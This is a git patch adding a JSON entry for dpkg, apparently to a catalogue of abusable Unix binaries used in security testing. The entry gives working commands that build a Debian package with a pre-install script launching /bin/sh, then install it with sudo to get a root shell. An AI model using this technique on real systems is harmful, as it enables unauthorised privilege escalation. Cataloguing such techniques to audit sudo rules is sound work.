From 1b28dce9a5e552e6603483f2b7ef378ef4ea2ae9 Mon Sep 17 00:00:00 2001 From: t0thkr1s Date: Wed, 8 Jan 2020 12:26:21 +0100 Subject: [PATCH] add dpkg --- data/dpkg.json | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 data/dpkg.json diff --git a/data/dpkg.json b/data/dpkg.json new file mode 100644 index 0000000..26f8cc0 --- /dev/null +++ b/data/dpkg.json @@ -0,0 +1,10 @@ +{ + "functions": { + "sudo": [ + { + "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```", + "code": "sudo dpkg -i x_1.0_all.deb" + } + ] + } +} \ No newline at end of file